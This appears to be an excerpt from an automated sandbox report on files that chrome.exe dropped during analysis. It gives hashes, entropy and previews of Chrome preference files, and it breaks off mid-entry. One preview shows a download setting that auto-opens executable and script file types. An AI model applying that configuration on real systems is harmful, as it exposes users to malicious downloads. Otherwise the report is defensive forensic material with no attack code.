                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639881056"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\376f6551-872a-432e-8d3a-47e4613c647a.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205093
                                                                                                                                                            Entropy (8bit):6.043754925115104
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:qlZIgW3kM8tA5RB5xlEJkaqfIlUOoSiuR+:sCXkTtMvEJDoV
                                                                                                                                                            MD5:10039A72D49A4CE28FF21825092A0897
                                                                                                                                                            SHA1:16D3B05B5BB3FB69E9E0C8081C71FC1A913B10E0
                                                                                                                                                            SHA-256:A63A84D7AB056245E054E46C1AC1D6849FA8AEA4E94469B94CFA6155E80AABE2
                                                                                                                                                            SHA-512:924B022A4298B1E283FAC8CA018D1DD8BCC46C156905DCCC06C85A84B2304B830747D64F0A4DCECC1AF3542D9EAF9DCA07A6CC567CFA3D3D74CDCDFABD4A63BC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639881056"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\3c121f27-8d05-48e6-92ee-ca81bf9fd8ee.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205010
                                                                                                                                                            Entropy (8bit):6.043605865398495
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:XlZIgW3kM8tA5RB5xlEJkaqfIlUOoSiuR+:VCXkTtMvEJDoV
                                                                                                                                                            MD5:F363350CF3009D0C8B12076A08DEB7D6
                                                                                                                                                            SHA1:95A9C100E29C8AED7A34F3EC61C94C594B9239DB
                                                                                                                                                            SHA-256:C5BCEB8065E3AD945941EE0276BDEF753831D6D97B777F04CF7C89D00B46D51D
                                                                                                                                                            SHA-512:7386500705BEF4B6A5BF6FB771D49CF10836ADC450EAE1BA6187714C5CDF75A1A1AD2782F29854FD381860608BE28A78A027FFD1928DA6F575A471D1982CCE1E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639881056"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\61ba8136-eed9-4230-8009-242c3a646d63.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205183
                                                                                                                                                            Entropy (8bit):6.0439945236169805
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:HlZIgW3kM8tA5RB5xlEJkaqfIlUOoSiuR+:FCXkTtMvEJDoV
                                                                                                                                                            MD5:D17B3A84AD6C1D59950651517A14F475
                                                                                                                                                            SHA1:7EE3B738085A7781C02908BEA5FA24DA2CFD0522
                                                                                                                                                            SHA-256:EE72F18108380FEEB1A11BC2EBEFFF1A4B4245DC5573D39557CBD0E1C94B5876
                                                                                                                                                            SHA-512:50E8F4C4983B3164C744CEDDE7B75132177E11E6E886874EB26D822751E7C91D82FE8512F3DDEC630259B08997540A60C53494CBDA77EFB7629B7783BEA79F27
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639881056"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\75212abf-18c0-41d0-a998-563b5dd034b8.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):213256
                                                                                                                                                            Entropy (8bit):6.071071327330818
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:b4lZIgW3kM8tA5RB5xlEJkaqfIlUOoSiuR+:baCXkTtMvEJDoV
                                                                                                                                                            MD5:B578C4961D92F58E41C377E75FF182A0
                                                                                                                                                            SHA1:87A4262E63B8026B2B9330C9A4F9B79B634BEC9F
                                                                                                                                                            SHA-256:05EAB744F2699C0B37A070ACB99018E48E7A05FC8E053A1E28FC99F020E6E009
                                                                                                                                                            SHA-512:50E4B0642361464863E6E7988B73186C6B50C302EEF1CD2AD16BB296BC85CA3668D309550CA8AC13F14A7ADC6BD27313EC17D8883FCB335533DF473B9774AD1E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\7b7a6954-2ab6-4276-adc5-5e1bd0650254.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):93504
                                                                                                                                                            Entropy (8bit):3.7503851099650705
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:PvmtZnQejrkRQNRrqv1/3exL6HbyGSFrAj5xx2DT3bGr01rmkngfBBZ+OvXhNv8r:qWhNGXOmUeX5sT4/jS/K5vFFV
                                                                                                                                                            MD5:A96A8B4520EFC869B3A83051647BC1D9
                                                                                                                                                            SHA1:92663FAE6494CDA7602A57B741B26F4637C68734
                                                                                                                                                            SHA-256:36B9EBA42F7B63691F12EFFFA16BA4AA4A734538C50666A9C4482CCF5C6B0148
                                                                                                                                                            SHA-512:9BDF7DDCED0B8C595290481EC155C0C6744CD2053878092B25AE3BE354CE73F77D7433081BA46FFE7A85536BC92B2AD949BCFD7C672E6339D47C3F6944FBAA88
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<m..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...?_8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\8d2bdfdf-fa6f-4198-b09e-e386d51ff1e5.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):204815
                                                                                                                                                            Entropy (8bit):6.04308716089811
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:LlZIgW3kM8tA5RB5xlEJkaqfIlUOoSiuR+:ZCXkTtMvEJDoV
                                                                                                                                                            MD5:A1D4E79D58666EE4CF85FF4117ADB89B
                                                                                                                                                            SHA1:D43C8FD801638D315B394790B4194A5ED552398E
                                                                                                                                                            SHA-256:6A6BF49A08A06CC5FD879E7364CD9423D5211199E03BF51A5AB2D2F7C2AA7310
                                                                                                                                                            SHA-512:058A6EEE7FC30E4F80D3007004A67F003149511B295615213EA52D25DAD0EB9E2650C64AF74C14D58554ED0BDAA3F4685823182DED10DEB174395DB4F7BCCE50
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639881056"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\8ef717b8-5e67-450e-a0ba-377c84610f30.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):204907
                                                                                                                                                            Entropy (8bit):6.043335467493787
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:alZIgW3kM8tA5RB5xlEJkaqfIlUOoSiuR+:cCXkTtMvEJDoV
                                                                                                                                                            MD5:321234182B46C9955D2CD71E307D7CDB
                                                                                                                                                            SHA1:7C0D180BFE2E78A3ECF707AAB14E3ADCA308A8C4
                                                                                                                                                            SHA-256:B1BFF237CA68E883D7C898412A85147110BB86F6B3DB6483613ADB4B0B385E4F
                                                                                                                                                            SHA-512:5CC5AE89323D6D4948BCD8DFEF44C75B00215705466B9A395AA1CECCB6B9AC28CE268355EB6E0117F5669F049F52319B0F5E22100134FB50B631311B3F2129CD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639881056"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40
                                                                                                                                                            Entropy (8bit):3.254162526001658
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FkXft0xE1n:+ftIE1n
                                                                                                                                                            MD5:BD4642AD6C750A12D912B20BCB92E14D
                                                                                                                                                            SHA1:C549F0F48FDD4FBC62E51AC26D7E185160CE2123
                                                                                                                                                            SHA-256:4FD71FE78DFE203137C89C9FB0734358FF432F2BC83338112DC7B830F9B30F2C
                                                                                                                                                            SHA-512:04410D12EF327614C3AF1251C9906BFEB2977211A7F53CBB08A8C01F9465A382CD001E51AB936A0D196D359F1DECDDAEAF5E7D1DBD49CE5F4FF91BF5C332B6CF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:sdPC....................s}.....M..2.!..%

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\04feef38-3821-409d-b560-1f5251bf45a3.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4219
                                                                                                                                                            Entropy (8bit):4.872018881330007
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMW:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhV
                                                                                                                                                            MD5:4D6211D587D9988E5C6844A6991B2B1F
                                                                                                                                                            SHA1:91424F3C60773B86D6814C49DD754DD5F40504AA
                                                                                                                                                            SHA-256:9638DA029231FCBAD7E8FA6902B3224313900051625209D8F11182815A6B97E0
                                                                                                                                                            SHA-512:4A0BB681C3DEA2AF6A3516089A5113E4A8CD933E7D22C21E95C8F785674FD28537D2612F8BF0EC861AE92F4BFAB3CEB4CAEFEFB1C494E41D5753756324E628F9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\18f6875a-0bf4-414d-bd0f-31c7cf600456.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\29df2fb5-9b4e-4c8a-9519-537d61e8d6db.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17703
                                                                                                                                                            Entropy (8bit):5.577350645012247
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:X7UtZLlDpXb1kXqKf/pUZNCgVLH2HfDmrUttmmpW14L:wLlRb1kXqKf/pUZNCgVLH2HfirUfmmIa
                                                                                                                                                            MD5:BC25AA351DF740EA955FE580998327B9
                                                                                                                                                            SHA1:5D6FE6D9EC5F7B7CA9FEA77BE2D5619E8B3B8699
                                                                                                                                                            SHA-256:9F34141FED8CDB0E164AD4F22482DE5D947D525B0FFCBC0224CFEFD359C931CB
                                                                                                                                                            SHA-512:DEBBD52D292D5DF5961EE8A9F1D220B1060EE2C9A27E8EF08DA0CCA4A7314453F144424286D59262260478833279C6CD5A432E1B7B45A0F6F7C31C2E6B1E0828
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13299837697099911","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\357e9c60-d26b-4075-9c9f-8c2bbefc21d1.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4873
                                                                                                                                                            Entropy (8bit):4.960949974745613
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Yc3UklSLklwHjbaRc9qAQiqTlYqlQKHoTw00jH3CH3G/s8C1Nfct/9BhUJo3Khmx:nHCNa6MH1pcKICJok0JCKL8VbOTQVuwn
                                                                                                                                                            MD5:7A48459F0D3E66D90A5D61656DF3C109
                                                                                                                                                            SHA1:C526C27CD3B16CDFC0F974FB66D2F2991C3C21C5
                                                                                                                                                            SHA-256:079B0E5BE59BF3319673359681E6891667CD49AB0357529039160BF5099F180F
                                                                                                                                                            SHA-512:C14195A57E041EB0F0F5188764B18C119EBBACEB5AFADC527D37869558CE6369078BAD3246CB00A8DC3E8A9E40CC8BD163C13CB0D3568DF59CFEF8F8F5667CB3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13299837697847611","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\4c1bbe95-72bd-4caf-80c4-9417deeea171.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4898
                                                                                                                                                            Entropy (8bit):4.965051882371517
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:nHCNa6ZH1pcKICJok0JCKL8vAbOTQVuwn:nHCoi1pcT4KoS
                                                                                                                                                            MD5:C3FEBCD87583AD090650ED09AF2BD871
                                                                                                                                                            SHA1:194B176AE39EE675C813952F38CD0B86B8EB767F
                                                                                                                                                            SHA-256:8F2D116ED49CBFB829BF8B37F7DE57F2ADCF029DBED8CA43B73FCE1FB0F406E4
                                                                                                                                                            SHA-512:F443E29D46C5F5748816CB1D6F1BA74E53CE4C4528B5F8D469BAC36870338B8CC0DE620A20B427DBE16CFFDA26EEACF2AAC9730719C96963AA45B38F738056C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13299837697847611","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\74fb58cb-5ba1-4ca7-ad94-8784dda6689e.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1880
                                                                                                                                                            Entropy (8bit):4.898536033155538
